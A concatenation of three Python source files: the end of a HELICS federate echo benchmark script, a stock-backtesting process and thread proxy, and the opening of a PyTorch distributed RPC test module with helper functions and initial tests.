parties (int) - The number of parties for the thread barrier.
In this case, it is the number of federates plus 1.
vFed (helics federate object) - The value federate.
Returns:
(null)
"""
logging.info("echo leaf - starting the execution of the helics functions")
self.vFed = vFed
self.parties = parties
if not self.readyToRun:
self.make_ready(self.vFed)
sys.stdout.flush()
self.call_on_ready(self.parties)
sys.stdout.flush()
self._main_loop(self.vFed)
logging.info("echo leaf - finished the execution of the helics functions")
def __del__(self):
h.helicsFederateFree(self.vFed)
logging.info("echo leaf - the test is done -> information is cleared")
def timer():
logging.info("starting the timer")
def BMecho_singleCore(federates):
"""This function performs the echo test.
Args:
federates (int) - The number of federates to create for the single
core echo test.
Returns:
(null)
"""
logging.info("starting the single core test")
t = Timer(1, timer)
t.cancel()
feds = [f for f in range(0, federates)]
wcore = h.helicsCreateCore("inproc", None, "--autobroker --federates={}".format((federates)))
hub = EchoHub_c()
hub_vFed = hub.create_value_federate(h.helicsCoreGetIdentifier(wcore))
hub.initialize(hub_vFed, federates)
leafs = [EchoLeaf_c() for f in range(0, federates)]
i = 0
leaf_vFeds = []
logging.info("preparing the federates")
for f in feds:
leaf_vFed = leafs[f].create_value_federate(h.helicsCoreGetIdentifier(wcore), i)
leafs[f].initialize(leaf_vFed, i)
leaf_vFeds.append(leaf_vFed)
i += 1
threads = []
i = 0
logging.info("creating the threads")
for l, f in zip(leaf_vFeds, feds):
x = Thread(target=leafs[f].run, name=leafs[f], args=(len(feds) + 1, l))
threads.append(x)
x.start()
i += 1
time.sleep(0.1)
hub.make_ready(hub_vFed)
logging.info("executing the echo hub")
t.start()
hub.run(len(feds) + 1, hub_vFed)
t.cancel()
logging.info("joining the threads")
for thrd in threads:
thrd.join()
h.helicsCoreFree(wcore)
h.helicsCleanupLibrary()
logging.info("finished the single core test")
def BMecho_multiCore(cTypeString, federates):
"""This function performs the multicore test for a specific core
type.
Args:
cTypeString (str) - Specific core type, e.g. inproc
federates (int) - The number of federates to create for the echo
multicore test.
Returns:
(null)
"""
logging.info("starting the multicore test for {}".format(cTypeString))
t = Timer(1, timer)
t.cancel()
if h.helicsIsCoreTypeAvailable(cTypeString) == h.helics_false:
t.start()
feds = [f for f in range(0, federates)]
initString = "--log_level=no_print --federates={}".format(federates)
broker = h.helicsCreateBroker(cTypeString, "brokerf", initString)
wcore = h.helicsCreateCore(cTypeString, "", "--federates=1 --log_level=no_print")
hub = EchoHub_c()
hub_vFed = hub.create_value_federate(h.helicsCoreGetIdentifier(wcore))
hub.initialize(hub_vFed, federates)
leafs = [EchoLeaf_c() for f in range(0, federates)]
cores = []
i = 0
leaf_vFeds = []
logging.info("preparing the federates")
for f in feds:
core = h.helicsCreateCore(cTypeString, None, "-f 1 --log_level=no_print")
h.helicsCoreConnect(core)
leaf_vFed = leafs[f].create_value_federate(h.helicsCoreGetIdentifier(core), i)
leafs[f].initialize(leaf_vFed, i)
leaf_vFeds.append(leaf_vFed)
cores.append(core)
i += 1
threads = []
i = 0
logging.info("creating the threads")
for l, f in zip(leaf_vFeds, feds):
x = Thread(target=leafs[f].run, name=leafs[f], args=(len(feds) + 1, l))
threads.append(x)
x.start()
i += 1
time.sleep(0.1)
hub.make_ready(hub_vFed)
logging.info("executing the echo hub")
t.start()
hub.run(len(feds) + 1, hub_vFed)
t.cancel()
logging.info("joining the threads")
for thrd in threads:
thrd.join()
h.helicsBrokerDisconnect(broker)
h.helicsBrokerFree(broker)
logging.info("clearing the cores")
for cr in cores:
h.helicsCoreFree(cr)
cores.clear()
h.helicsCoreFree(wcore)
h.helicsCleanupLibrary()
logging.info("finished the multicore test for {}".format(cTypeString))
def create_bm_dictionary(name, federate_count, core_type, real_time, cpu_time, threads):
"""This function creates a dictionary for a single benchmark
run.
Args:
name (str) - The name of the benchmark, e.g. BMecho_singleCore
federate_count (int) - The number of federates.
core_type (str) - The name of the core type.
real_time (float) - The wall-clock time it takes to
execute the benchmark.
cpu_time (float) - The CPU time it takes to execute the benchmark.
threads (int) - The number of threads.
Returns:
bm_dict (dict) - A dictionary of the benchmark results.
"""
if name == "BMecho_singleCore":
bm_dict = {
"name": "{}/{}/iterations:1/real_time".format(name, federate_count),
"run_name": "{}/{}/iterations:1/real_time".format(name, federate_count),
"run_type": "iteration",
"repetitions": 1,
"repetitions_index": 1,
"threads": threads,
"iterations": 1,
"real_time": real_time,
"cpu_time": cpu_time,
"time_unit": "s",
}
else:
bm_dict = {
"name": "{}/{}Core/{}/real_time".format(name, core_type, federate_count),
"run_name": "{}/{}Core/{}/real_time".format(name, core_type, federate_count),
"run_type": "iteration",
"repetitions": 1,
"repetitions_index": 1,
"threads": threads,
"iterations": 1,
"real_time": real_time,
"cpu_time": cpu_time,
"time_unit": "s",
}
return bm_dict
def wrapper(func, *args, **kwargs):
"""This is a wrapper function to be used for benchmarking. It allows
func to be passed directly to timeit.
Args:
func (function) - The function to be wrapped.
Returns:
wrapped (function) - The original function, but in a format that
is ready to be passed to the timeit function call.
"""
def wrapped():
return func(*args, **kwargs)
return wrapped
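# Illustrative usage (this mirrors how _auto_run drives the benchmarks below):
#   stmt = wrapper(BMecho_singleCore, 4)  # 4 federates
#   elapsed = timeit.timeit(stmt=stmt, number=1)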
def create_output_file(benchmark, output_path, filename, date, bm_dicts):
"""This function creates the output file, which contains some basic
information, along with the benchmark results.
Args:
benchmark (str) - The name of the benchmark, e.g. echoBenchmark
output_path (str) - The location to send the results.
filename (str) - The name of the results file.
date (datetime object) - The date and time of the benchmark run.
bm_dicts (list) - The list of benchmark results.
Returns:
(null)
"""
helics_version = h.helicsGetVersion()
cpu_freq = psutil.cpu_freq()
# zmq_version = h.getZMQVersion()
s, v, c = platform.system(), platform.version(), platform.python_compiler()
compiler = "{}-{}:{}".format(s, v, c)
build_flags_dict = sysconfig.get_config_vars()
build_flags = (
str(build_flags_dict.get("base")) + "\\" + "py{}".format(build_flags_dict.get("py_version"))
)
machine = platform.machine()
# NOTE: To get the host name, do platform.node()
# Creating the header string
string = "HELICS_BENCHMARK: {}\n".format(benchmark)
string += "------------HELICS BUILD INFO -------------\n"
string += "HELICS VERSION: {}\n".format(helics_version)
# string += 'ZMQ VERSION: {}\n'.format(zmq_version)
string += "COMPILER INFO: {}\n".format(compiler)
string += "BUILD FLAGS: {}\n".format(build_flags)
string += "------------PROCESSOR INFO ----------------\n"
string += "HOST PROCESSOR TYPE: {}\n".format(machine)
string += "CPU MODEL: {}\n".format(cpuinfo.get_cpu_info().get("brand"))
string += "NUM CPU: {}\n".format(multiprocessing.cpu_count())
string += "-------------------------------------------\n"
bm_dict = {
"context": {
"date": date,
"host_name": platform.node(),
"executable": sys.executable,
"num_cpus": multiprocessing.cpu_count(),
"mhz_per_cpu": cpu_freq.max,
"cpu_scaling_enabled": False,
"caches": [],
"load_avg": [],
"library_build_type": "release",
},
"benchmarks": bm_dicts,
}
bm_dict = json.dumps(bm_dict, indent=2)
string += str(bm_dict)
# Combining the header string with the benchmark dictionary
with open("{}\\{}.txt".format(output_path, filename), "w") as output_file:
output_file.write(string)
def _auto_run(args):
"""This function runs this script as a stand-alone executable.
Args:
'-p' or '--power' - An integer, including 0, used to determine
how many federates should be created, i.e. the benchmarks are run
with 2**i federates for i = 0, 1, ..., power-1.
'-o' or '--output_path' - The path to send the benchmark results.
Returns:
(null)
"""
logging.info("starting the echoBenchmark run")
benchmarks = []
assert isinstance(args.power, int)
for i in range(0, args.power):
single = wrapper(BMecho_singleCore, 2**i)
single_real_time_start = time.time()
BMecho_singleCore(2**i)
single_real_time_stop = time.time()
single_cpu_time = timeit.timeit(stmt=single, number=1)
single_real_time = single_real_time_stop - single_real_time_start
single_dict = create_bm_dictionary(
"BMecho_singleCore", 2**i, "singleCore", single_real_time, single_cpu_time, 1
)
inproc = wrapper(BMecho_multiCore, "inproc", 2**i)
inproc_real_time_start = time.time()
BMecho_multiCore("inproc", 2**i)
inproc_real_time_stop = time.time()
inproc_cpu_time = timeit.timeit(stmt=inproc, number=1)
inproc_real_time = inproc_real_time_stop - inproc_real_time_start
inproc_dict = create_bm_dictionary(
"BMecho_multiCore", 2**i, "inproc", inproc_real_time, inproc_cpu_time, 1
)
zmq = wrapper(BMecho_multiCore, "zmq", 2**i)
zmq_real_time_start = time.time()
BMecho_multiCore("zmq", 2**i)
zmq_real_time_stop = time.time()
zmq_cpu_time = timeit.timeit(stmt=zmq, number=1)
zmq_real_time = zmq_real_time_stop - zmq_real_time_start
zmq_dict = create_bm_dictionary(
"BMecho_multiCore", 2**i, "zmq", zmq_real_time, zmq_cpu_time, 1
)
zmqss = wrapper(BMecho_multiCore, "zmqss", 2**i)
zmqss_real_time_start = time.time()
BMecho_multiCore("zmqss", 2**i)
zmqss_real_time_stop = time.time()
zmqss_cpu_time = timeit.timeit(stmt=zmqss, number=1)
zmqss_real_time = zmqss_real_time_stop - zmqss_real_time_start
zmqss_dict = create_bm_dictionary(
"BMecho_multiCore", 2**i, "zmqss", zmqss_real_time, zmqss_cpu_time, 1
)
udp = wrapper(BMecho_multiCore, "udp", 2**i)
udp_real_time_start = time.time()
BMecho_multiCore("udp", 2**i)
udp_real_time_stop = time.time()
udp_cpu_time = timeit.timeit(stmt=udp, number=1)
udp_real_time = udp_real_time_stop - udp_real_time_start
udp_dict = create_bm_dictionary(
"BMecho_multiCore", 2**i, "udp", udp_real_time, udp_cpu_time, 1
)
# NOTE: The following core types take way too long to complete.
# This indicates there is an issue that cannot be fixed by Python,
# but within HELICS for these core types to work. When these core
# types finally work, uncomment these lines and update the script
# to match the above lines and run this code to include their
# results.
# ipc = wrapper(BMecho_multiCore, 'ipc', 1)
# print('ipc core before timeit')
# ipc_b = timeit.timeit(stmt=ipc, number=1)
# print('ipc core after timeit')
# ipc_dict = create_bm_dictionary(
# 'BMecho_multiCore', 2**i, 'ipc', ipc_b, 1)
# tcp = wrapper(BMecho_multiCore, 'tcp', 1)
# tcp_b = timeit.timeit(stmt=tcp, number=1)
# tcp_dict = create_bm_dictionary(
# 'BMecho_multiCore', 2**i, 'tcp', tcp_b, 1)
# tcpss = wrapper(BMecho_multiCore, 'tcpss', 1)
# tcpss_b = timeit.timeit(stmt=tcpss, number=1)
# tcpss_dict = create_bm_dictionary(
# 'BMecho_multiCore', 2**i, 'tcpss', tcpss_b, 1)
benchmarks.append([single_dict, inproc_dict, zmq_dict, zmqss_dict, udp_dict])
# Flattening the nested benchmarks list before adding it to the output file
benchmarks = [val for sublist in benchmarks for val in sublist]
# Getting the current date and time of the run
date_time = "{}".format(datetime.datetime.now())
run_id = "".join(random.choices(string.ascii_uppercase + string.digits, k=5))
create_output_file(
"echoBenchmark",
args.output_path,
"bm_echo_pyResults{}_{}".format(datetime.date.today(), str(run_id)),
date_time,
benchmarks,
)
logging.info("finished the echoBenchmark run")
if __name__ == "__main__":
fileHandle = logging.FileHandler("echoBenchmarks.log", mode="w")
fileHandle.setLevel(logging.DEBUG)
streamHandle = logging.StreamHandler(sys.stdout)
streamHandle.setLevel(logging.ERROR)
logging.basicConfig(level=logging.INFO, handlers=[fileHandle, streamHandle])
parser = argparse.ArgumentParser(description="Produce benchmark results.")
script_path = os.path.dirname(os.path.realpath(__file__))
# print(script_path)
head, tail = os.path.split(script_path)
parser.add_argument("-p", "--power", nargs="?", default=2)
parser.add_argument("-o", "--output_path", nargs="?", default=os.path.join(head))
args = parser.parse_args()
_auto_run(args)
|
DyStockBackTestingStrategyEngineProxy.py
|
import multiprocessing
import threading
import queue
from .DyStockBackTestingStrategyEngineProcess import *
class DyStockBackTestingStrategyEngineProxy(threading.Thread):
""" 以进程方式启动一个周期的策略回测 """
def __init__(self, eventEngine):
super().__init__()
self._eventEngine = eventEngine
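# Use the 'spawn' start method so each backtesting process starts from a fresh interpreter,
# instead of inheriting the parent's threads and event-engine state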
self._ctx = multiprocessing.get_context('spawn')
self._queue = self._ctx.Queue() # queue to receive event from child processes
self._processes = []
self._childQueues = []
self.start()
def run(self):
while True:
event = self._queue.get()
self._eventEngine.put(event)
def startBackTesting(self, reqData):
childQueue = self._ctx.Queue()
self._childQueues.append(childQueue)
p = self._ctx.Process(target=dyStockBackTestingStrategyEngineProcess, args=(self._queue, childQueue, reqData))
p.start()
self._processes.append(p)
class DyStockBackTestingStrategyEngineProxyThread(threading.Thread):
""" 以线程方式启动一个周期的策略回测, 主要做调试用 """
def __init__(self, eventEngine):
super().__init__()
self._eventEngine = eventEngine
self._queue = queue.Queue() # queue to receive event from child threads
self._threads = []
self._childQueues = []
self.start()
def run(self):
while True:
event = self._queue.get()
self._eventEngine.put(event)
def startBackTesting(self, reqData):
childQueue = queue.Queue()
self._childQueues.append(childQueue)
t = threading.Thread(target=dyStockBackTestingStrategyEngineProcess, args=(self._queue, childQueue, reqData))
t.start()
self._threads.append(t)
|
rpc_test.py
|
import concurrent.futures
import contextlib
import json
import os
import sys
import threading
import time
from collections import namedtuple
from functools import partial
from threading import Event
from threading import Lock
from unittest import mock
import torch
import torch.nn as nn
import torch.distributed as dist
import torch.distributed.rpc as rpc
import torch.distributed.autograd as dist_autograd
from torch.distributed.rpc import RRef, _get_debug_info, _rref_context_get_debug_info
from torch.distributed.rpc.api import _delete_all_user_and_unforked_owner_rrefs, _use_rpc_pickler, _thread_local_var, _wait_all
from torch.distributed.rpc.internal import (
PythonUDF,
RPCExecMode,
_internal_rpc_pickler,
_build_rpc_profiling_key,
)
from torch.futures import Future
from torch.testing._internal.common_distributed import (
skip_if_lt_x_gpu,
captured_output,
)
from torch.testing._internal.common_utils import IS_MACOS, load_tests, sandcastle_skip_if
from torch.testing._internal.dist_utils import (
dist_init,
get_function_event,
initialize_pg,
wait_until_node_failure,
wait_until_pending_futures_and_users_flushed,
wait_until_owners_and_forks_on_rank,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_utils import TemporaryFileName
from torch.autograd.profiler_legacy import profile as _profile
def foo_add():
return torch.add(torch.ones(1), torch.ones(1))
def udf_with_torch_ops(device=-1, use_record_function=False):
device_ctx = contextlib.suppress() if device == -1 else torch.cuda.device(device)
record_function_ctx = (
torch.autograd.profiler.record_function("##forward##")
if use_record_function
else contextlib.suppress()
)
with device_ctx, record_function_ctx:
t1, t2 = torch.ones(1), torch.ones(1)
t = torch.add(t1, t2)
t = torch.mul(t, t)
t = t.relu()
t = t.sigmoid()
# Events (operator invocations) that are expected to run as part of the above
# function.
EXPECTED_REMOTE_EVENTS = [
"aten::ones",
"aten::ones",
"aten::add",
"aten::mul",
"aten::relu",
"aten::clamp_min",
"aten::sigmoid",
]
# Remote operations are prefixed with the following string for RPC profiling.
REMOTE_OP_STR = "#remote_op: "
VALUE_FUTURE = concurrent.futures.Future()
DONE_FUTURE = concurrent.futures.Future()
FIFTY_MIL_CYCLES = 50000000
_rpc_barrier_count = 0
def _increment_count():
global _rpc_barrier_count
_rpc_barrier_count += 1
def _reset_count():
global _rpc_barrier_count
_rpc_barrier_count = 0
class StubRpcAgent:
def __init__(self, world_size):
self.world_size = world_size
def get_worker_infos(self):
return {
rpc.WorkerInfo(name=worker_name(rank), id=rank)
for rank in range(self.world_size)
}
def _stub_construct_rpc_backend_options_handler(**kwargs):
return mock.Mock() # RpcBackendOptions.
def _stub_init_rpc_backend_handler(store, name, rank, world_size, rpc_backend_options):
return StubRpcAgent(world_size=world_size)
def set_value(value):
VALUE_FUTURE.set_result(value)
def wait_for_value_future():
return VALUE_FUTURE.result()
def set_and_check_done(value):
VALUE_FUTURE.set_result(value)
return DONE_FUTURE.result()
# The following classes and functions are used to test Python user-defined
# functions, classes and methods over RPC.
TensorClass = namedtuple("TensorClass", ["tensors"])
class MyPickleClass:
def __init__(self):
self.t = None
def __getstate__(self):
(pickled_python_udf, tensors) = _internal_rpc_pickler.serialize(
PythonUDF(my_tensor_function, (torch.ones(2, 2), torch.ones(2, 2)), None)
)
return (pickled_python_udf, tensors)
def __setstate__(self, obj):
python_udf = _internal_rpc_pickler.deserialize(obj[0], obj[1])
result = python_udf.func(python_udf.args[0], python_udf.args[1])
self.t = result
def set(self, val):
self.t = val
class SlowPickleClass:
def __init__(self, t):
self.t = t
def __getstate__(self):
time.sleep(self.t)
return (self.t, )
def __setstate__(self, obj):
self.t = obj[0]
time.sleep(self.t)
class MyClass:
def __init__(self, a, delay=False):
self.a = a
# delay initialization to simulate errors if specified
if delay:
time.sleep(2)
def my_instance_method(self, b):
return self.a + b
@classmethod
def my_class_method(cls, d, e):
return d + e
@staticmethod
def my_static_method(f):
return f > 10
def increment_value(self, increment):
self.a += increment
def get_value(self):
return self.a
def my_slow_method(self, my_tensor_arg):
time.sleep(5)
return torch.add(self.a, my_tensor_arg)
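# Invokes a method on the value owned locally by an RRef; used to call instance
# methods of a remote object over RPC.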
def _call_method_on_rref(method, rref, *args, **kwargs):
return method(rref.local_value(), *args, **kwargs)
def get_rref_list(values):
return [RRef(MyClass(a)) for a in values]
def add_rref_to_value(rref, value):
return rref.to_here() + value
def run_nested_pickle(pickle_cls_instance, tensor):
return pickle_cls_instance.t + tensor
def build_sparse_tensor():
i = [[0, 1, 1], [2, 0, 2]]
v = [3, 4, 5]
return torch.sparse_coo_tensor(i, v, (2, 3))
def build_complex_tensors():
a = torch.ones(3, 3)
b = [a, a]
c = [b, b]
d = [a, b]
e = {a: d}
return [a, b, c, d, e]
def non_cont_test(t_view, t_cont):
if t_view.is_contiguous():
raise Exception('t_view is contiguous!')
if not t_cont.is_contiguous():
raise Exception('t_cont is not contiguous!')
if not torch.equal(t_view, t_cont):
raise Exception('t_view is not equal to t_cont!')
return t_view
def my_function(a, b, c):
return a + b + c
def my_tensor_function(a, b):
return a + b
def my_sleep_func(seconds=1):
time.sleep(seconds)
return torch.mul(torch.tensor(1), torch.tensor(1))
def my_complex_tensor_function(list_input, tensor_class_input, dict_input):
res = list_input[0]
for t in list_input:
res += t
for k, v in dict_input.items():
res += v
complex_tensors = tensor_class_input.tensors
return (res, complex_tensors[0], complex_tensors[1], complex_tensors[2])
def my_rref_function(rref_a, rref_b):
return rref_a.to_here() + rref_b.to_here()
def delayed_add(a, b, seconds=0.05):
time.sleep(seconds)
return a + b
def no_result():
print("do nothing")
def raise_or_inc(value):
if value.numel() == 2:
raise ValueError("Expected error")
return value + 1
def nested_rpc(dst):
return rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
def multi_layer_nested_async_rpc(dst, world_size, ttl):
# this function returns immediately without blocking, but while ttl > 0 it keeps
# generating additional nested async RPC requests.
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
rpc.rpc_async(
current_dst,
multi_layer_nested_async_rpc,
args=(next_dst, world_size, ttl - 1),
)
return 0
def nested_rref(dst):
return (
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1)),
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 2)),
)
def nested_remote(dst):
rref = rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 3))
return rref.to_here()
def rref_forward_chain(dst, world_size, rref, ttl):
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
ret_rref = rpc.remote(
current_dst, rref_forward_chain, args=(next_dst, world_size, rref, ttl - 1)
)
return [ret_rref]
else:
return rref.to_here()
def rpc_return_rref(dst):
return rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1))
def light_rpc():
return 0
def heavy_rpc(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
@torch.jit.script
def heavy_rpc_torchscript(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
@torch.jit.script
def my_script_func(tensor):
return torch.add(tensor, tensor)
expected_err = "Expected error"
def raise_func():
raise ValueError(expected_err)
@torch.jit.script
def raise_func_script(expected_err: str) -> torch.Tensor:
raise ValueError(expected_err)
expected_err_escape = "\nFirst line of error \n next line of error \n last line of error"
def raise_func_escape():
raise ValueError(expected_err_escape)
global_rref = None
def set_global_rref(rref):
global global_rref
global_rref = rref
def clear_global_rref():
global global_rref
global_rref = None
def check_rref_confirmed(rref):
return rref.confirmed_by_owner()
def get_rref_debug_info():
return _rref_context_get_debug_info()
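# The helpers below route results from rpc_async futures through user-created futures
# (both concurrent.futures.Future and torch.futures.Future), including nested callbacks.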
def add_use_future_cb(to, x, y, z):
out = concurrent.futures.Future()
def callback(fut):
out.set_result(fut.wait() + z)
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(callback)
return out.result()
def get_events_from_profile(profile_rref):
return profile_rref.local_value().process_global_function_events
def add_use_future_set_result(to, x, y, z):
out = torch.futures.Future()
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(lambda fut : out.set_result(fut.wait() + z))
return out.wait()
def add_use_future_nested_cb(to, x, y, z):
out = torch.futures.Future()
def callback(fut1):
fut2 = rpc.rpc_async(to, torch.add, args=(fut1.wait(), z))
fut2.then(lambda fut2 : out.set_result(fut2.wait()))
fut1 = rpc.rpc_async(to, torch.add, args=(x, y))
fut1.then(callback)
return out.wait()
def fail_on_fut(fut):
pass
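# Functions decorated with @rpc.functions.async_execution are expected to return a
# Future on the callee; the variants below cover errors, wrong return types, chaining,
# fan-out, and CUDA streams.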
@rpc.functions.async_execution
def async_raise_func():
raise RuntimeError("Expected error")
@rpc.functions.async_execution
def async_wrong_type():
return torch.zeros(2, 2)
@rpc.functions.async_execution
def async_add(to, x, y):
return rpc.rpc_async(to, torch.add, args=(x, y))
def slow_add(x, y, device="cpu"):
time.sleep(1)
x = x.to(device)
y = y.to(device)
return torch.add(x, y).cpu()
@rpc.functions.async_execution
def slow_async_add(to, x, y, device="cpu"):
return rpc.rpc_async(to, slow_add, args=(x, y, device))
@rpc.functions.async_execution
def async_add_with_future_ctor(to, x, y, z):
fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut1: fut.set_result(fut1.wait() + z)
)
return fut
@rpc.functions.async_execution
def async_add_chained(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_chained_multi(to, x, num, step):
fut = rpc.rpc_async(to, torch.add, args=(x, 0))
for _ in range(num):
fut = fut.then(lambda fut: fut.wait() + step)
return fut
@rpc.functions.async_execution
def async_add_nested(to, x, y, z):
return rpc.rpc_async(to, async_add, args=(to, x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_multi_fanout(to, x, num, step):
futs = []
for i in range(num):
if i == 0:
futs.append(rpc.rpc_async(to, torch.add, args=(x, step)))
else:
futs.append(rpc.rpc_async(to, torch.add, args=(0, step)))
# TODO: use torch.futures.collect_all
lock = Lock()
state = {"cnt": 0, "ret": torch.zeros_like(x)}
ret_future = torch.futures.Future()
def inc_and_set(fut):
with lock:
state["cnt"] += 1
state["ret"] += fut.wait()
if state["cnt"] >= len(futs):
ret_future.set_result(state["ret"])
for fut in futs:
fut.then(inc_and_set)
return ret_future
@rpc.functions.async_execution
def async_cuda_sleep_and_set_to_one(t):
device = t.device
original_stream = torch.cuda.current_stream(device)
new_stream = torch.cuda.Stream(device)
new_stream.wait_stream(original_stream)
with torch.cuda.stream(new_stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
t.fill_(1)
fut = Future(devices=[device])
fut.set_result(t)
return fut
@rpc.functions.async_execution
def async_cuda_nested_add(to, x, y, z):
def cb(fut):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
return fut.value() + z
return rpc.rpc_async(to, torch.add, args=(x, y)).then(cb)
# A custom Python class that contains a tensor, needed to see if we correctly
# use the Python pickler to extract tensors from non-IValue-convertible types.
class TensorWrapper:
__slots__ = ("tensor", "lock", "event")
def __init__(self, t):
self.tensor = t
# Add one non-picklable field, to ensure it's ignored/skipped.
self.lock = Lock()
self.event = torch.cuda.Event(enable_timing=True)
def increase(self, v):
with self.lock:
self.tensor += v
def sum(self):
with self.lock:
self.event.record()
return self.tensor.sum()
# Copied from test/test_cuda.py.
_cycles_per_ms = None
def get_cycles_per_ms():
"""Approximate number of cycles per millisecond for torch.cuda._sleep"""
global _cycles_per_ms
if _cycles_per_ms is None:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
_cycles_per_ms = 1000000 / start.elapsed_time(end)
return _cycles_per_ms
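# Exercises @rpc.functions.async_execution when applied to static, class, and bound
# instance methods.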
class AsyncExecutionClass:
@staticmethod
@rpc.functions.async_execution
def static_async_add(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@classmethod
@rpc.functions.async_execution
def class_async_add(cls, to, x, y, z):
ret_fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: ret_fut.set_result(fut.wait() + z)
)
return ret_fut
@rpc.functions.async_execution
def bound_async_add(self, to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
def return_future():
return torch.futures.Future()
class FooBackendOptions(rpc.RpcBackendOptions):
def __init__(self, init_method):
# Must call the __init__ of the superclass (and do so directly,
# without using super()) because... pybind.
rpc.RpcBackendOptions.__init__(self)
self.init_method = init_method
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
class RpcTest(RpcAgentTestFixture):
@dist_init
def test_worker_id(self):
n = self.rank + 1
peer_rank = n % self.world_size
self_worker_info = rpc.get_worker_info()
peer_worker_info = rpc.get_worker_info(worker_name(peer_rank))
self.assertEqual(self_worker_info.name, worker_name(self.rank))
self.assertEqual(peer_worker_info.name, worker_name(peer_rank))
with self.assertRaisesRegex(RuntimeError, "Unknown destination worker"):
unknown_worker_id = rpc.get_worker_info("WorkerUnknown")
@dist_init
def test_get_worker_infos(self):
worker_infos = rpc.api._get_current_rpc_agent().get_worker_infos()
worker_names = {worker_info.name for worker_info in worker_infos}
expected_worker_names = {
worker_name(rank) for rank in range(self.world_size)
}
self.assertEqual(worker_names, expected_worker_names)
worker_ids = {worker_info.id for worker_info in worker_infos}
expected_worker_ids = set(range(self.world_size))
self.assertEqual(worker_ids, expected_worker_ids)
@dist_init
def test_self_add(self):
self_worker_info = rpc.get_worker_info()
self_worker_name = worker_name(self.rank)
fut = rpc.rpc_async(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
ret = rpc.rpc_sync(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertEqual(ret, torch.ones(2, 2) + 1)
@dist_init
def test_send_to_rank(self):
dst_rank = (self.rank + 1) % self.world_size
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test invalid ranks
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(self.world_size + 1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(-1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank + 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank - 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
@dist_init
def test_self_py_udf_remote(self):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(torch.ones(2, 2), 1, 3))
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1 + 3)
def _test_self_remote_rref_as_rpc_arg(self, dst):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(torch.ones(2, 2), 1, 3))
fut = rpc.rpc_async(dst, add_rref_to_value, args=(rref, torch.ones(2, 2)))
ret = rpc.rpc_sync(dst, add_rref_to_value, args=(rref, torch.ones(2, 2) + 1))
self.assertEqual(ret, torch.ones(2, 2) + 1 + 3 + torch.ones(2, 2) + 1)
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1 + 3 + torch.ones(2, 2))
@dist_init
def test_self_remote_rref_as_rpc_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_self_remote_rref_as_rpc_arg(dst)
@dist_init
def test_self_remote_rref_as_self_rpc_arg(self):
self._test_self_remote_rref_as_rpc_arg(rpc.get_worker_info())
def _test_self_remote_rref_as_remote_arg(self, dst):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(torch.ones(2, 2), 1, 3))
ret_rref = rpc.remote(dst, add_rref_to_value, args=(rref, torch.ones(2, 2)))
self.assertEqual(
ret_rref.to_here(), torch.ones(2, 2) + 1 + 3 + torch.ones(2, 2)
)
@dist_init
def test_self_remote_rref_as_remote_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_self_remote_rref_as_remote_arg(dst)
@dist_init
def test_rref_proxy_non_exist(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
msg = "has no attribute \'non_exist\'"
with self.assertRaisesRegex(AttributeError, msg):
